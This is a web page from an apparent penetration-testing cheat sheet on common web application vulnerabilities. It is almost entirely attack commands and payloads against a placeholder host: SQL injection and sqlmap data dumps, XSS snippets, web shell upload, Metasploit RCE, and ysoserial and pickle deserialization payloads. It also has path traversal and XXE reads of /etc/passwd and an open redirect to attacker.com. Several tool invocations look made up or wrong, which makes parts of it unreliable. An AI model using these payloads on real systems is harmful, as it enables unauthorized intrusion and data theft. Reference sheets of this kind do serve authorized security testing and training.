Initializing VAULT-TEC OS...
Loading security protocols...
Establishing secure connection...
Connection established.
SYSTEM READY

Vault-Tec Terminal

ABOUT POSTS NOTES TOOLS

CheatSheets

CURL DNS File Transfer Hydra Impacket JohnTheRipper NCAT NMAP Online Resources Reverse Shell Wordlists

Active Directory

Mindmap Attacking AD Linux AD

Cloud

AWS Azure Google Terraform

Container

Docker Kubernetes

Linux

Penetration Testing Checklist Enumeration Privilege Escalation Post Exploitation Services Tools

Network

Data Exfiltration Port Scanning Reconnaissance Pivoting Services Traffic Analysis

Tech Stack

CMS Databases DevOps Enterprise Apps IAM Monitoring Open-Source Utilities Web Servers

Windows

AV/EDR Evasion Enumeration Privilege Escalation Post Exploitation

Web Application

Reconnaissance Common Vulnerabilities Authentication Bypass API Testing

Web Application Common Vulnerabilities

SQL Injection

# Test basic SQLi
curl "http://example.com/login?user=admin' OR 1=1 -- &pass="

# Use sqlmap
sqlmap -u http://example.com/login --data="user=admin&pass=test" --level=3 --risk=3

# Blind SQLi with time-based
sqlmap -u http://example.com/login --technique=T --dbms=mysql

# Extract data
sqlmap -u http://example.com/login --dump

# Union-based
curl "http://example.com/search?q=' UNION SELECT 1,2,3 --"

Cross-Site Scripting (XSS)

# Reflected XSS test
<script>alert('XSS')</script>

# Stored XSS in form
<input type="text" value="<script>alert('XSS')</script>">

# DOM-based XSS
window.location.href="javascript:alert('XSS')"

# Use XSS Hunter
xsshunter -u http://example.com

# Automate with XSStrike
xsstrike -u http://example.com/search

Cross-Site Request Forgery (CSRF)

# Test CSRF with curl
curl -X POST http://example.com/action -d "param=value"

# Generate CSRF PoC
csrfgen -u http://example.com -o csrf.html

# Check token absence
curl -I http://example.com/action

# Automate CSRF detection
arachni http://example.com --report=csrf

Remote Code Execution (RCE)

# Test basic RCE
curl "http://example.com/cmd?input=whoami"

# Use Metasploit for RCE
msfconsole -x "use exploit/multi/http/rce; set RHOSTS example.com; exploit"

# Upload and execute shell
curl -F "file=@shell.php" http://example.com/upload

# Check for deserialization
ysoserial -d CommonsCollections1 -o payload.ser
java -jar ysoserial.jar CommonsCollections1 "touch /tmp/pwned" > payload.ser

Other Vulnerabilities

# Directory Traversal
curl "http://example.com/download?file=../../etc/passwd"

# File Inclusion
curl "http://example.com?page=php://filter/convert.base64-encode/resource=index.php"

# Insecure Deserialization
python -c 'import pickle; data=pickle.loads(b"cos\\nsystem\\n(S'whoami'\\ntR."); print(data)'

# XML External Entity (XXE)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

# Open Redirect
curl "http://example.com/redirect?url=http://attacker.com"

Tools

  • sqlmap: sqlmap -u http://example.com
  • XSStrike: xsstrike -u http://example.com
  • Arachni: arachni http://example.com
  • Nikto: nikto -h http://example.com
  • OWASP ZAP: zap-cli -t http://example.com
  • ysoserial: ysoserial -d CommonsCollections1
  • wpscan: wpscan --url http://example.com